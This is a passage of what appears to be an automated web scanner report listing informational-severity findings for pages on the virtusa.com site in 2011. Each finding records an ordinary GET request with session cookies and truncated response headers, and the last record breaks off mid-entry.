7.596. http://www.virtusa.com/ftbu/services/business_process/policy-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/business_process/policy-management.asp

Request

GET /ftbu/services/business_process/policy-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21824
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:53:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:53:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.597. http://www.virtusa.com/ftbu/services/implementation-method/business-engineering.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/business-engineering.asp

Request

GET /ftbu/services/implementation-method/business-engineering.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20561
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.598. http://www.virtusa.com/ftbu/services/implementation-method/change-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/change-management.asp

Request

GET /ftbu/services/implementation-method/change-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20250
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.599. http://www.virtusa.com/ftbu/services/implementation-method/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/default.asp

Request

GET /ftbu/services/implementation-method/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20737
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:54:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:54:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.600. http://www.virtusa.com/ftbu/services/implementation-method/project-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/project-management.asp

Request

GET /ftbu/services/implementation-method/project-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20619
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:28 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.601. http://www.virtusa.com/ftbu/services/implementation-method/quality-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/quality-management.asp

Request

GET /ftbu/services/implementation-method/quality-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20368
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.602. http://www.virtusa.com/ftbu/services/implementation-method/software-selection.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/implementation-method/software-selection.asp

Request

GET /ftbu/services/implementation-method/software-selection.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20379
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:55:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:55:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.603. http://www.virtusa.com/ftbu/services/technology/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/default.asp

Request

GET /ftbu/services/technology/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20077
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.604. http://www.virtusa.com/ftbu/services/technology/industries/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/industries/default.asp

Request

GET /ftbu/services/technology/industries/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20687
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.605. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-t-rm-ca.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/industries/sap-is-t-rm-ca.asp

Request

GET /ftbu/services/technology/industries/sap-is-t-rm-ca.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20136
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.606. http://www.virtusa.com/ftbu/services/technology/industries/sap-is-u.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/industries/sap-is-u.asp

Request

GET /ftbu/services/technology/industries/sap-is-u.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20609
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.607. http://www.virtusa.com/ftbu/services/technology/industries/sap-ps-cd.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/industries/sap-ps-cd.asp

Request

GET /ftbu/services/technology/industries/sap-ps-cd.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20382
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.608. http://www.virtusa.com/ftbu/services/technology/industries/sap-trm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/industries/sap-trm.asp

Request

GET /ftbu/services/technology/industries/sap-trm.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19902
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.609. http://www.virtusa.com/ftbu/services/technology/insurance/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/default.asp

Request

GET /ftbu/services/technology/insurance/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20628
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.610. http://www.virtusa.com/ftbu/services/technology/insurance/sap-alice.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-alice.asp

Request

GET /ftbu/services/technology/insurance/sap-alice.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20390
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:49:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.611. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cd.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-fs-cd.asp

Request

GET /ftbu/services/technology/insurance/sap-fs-cd.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21144
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.612. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-cm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-fs-cm.asp

Request

GET /ftbu/services/technology/insurance/sap-fs-cm.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20822
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.613. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-icm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-fs-icm.asp

Request

GET /ftbu/services/technology/insurance/sap-fs-icm.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21405
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:24 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.614. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-pm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-fs-pm.asp

Request

GET /ftbu/services/technology/insurance/sap-fs-pm.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20250
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.615. http://www.virtusa.com/ftbu/services/technology/insurance/sap-fs-ri.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/insurance/sap-fs-ri.asp

Request

GET /ftbu/services/technology/insurance/sap-fs-ri.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21507
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:48:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:48:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.616. http://www.virtusa.com/ftbu/services/technology/integration-sap-non-sap.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/integration-sap-non-sap.asp

Request

GET /ftbu/services/technology/integration-sap-non-sap.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20135
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:50:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:50:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.617. http://www.virtusa.com/ftbu/services/technology/maintenance.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /ftbu/services/technology/maintenance.asp

Request

GET /ftbu/services/technology/maintenance.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20199
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:49:28 GMT; path=/
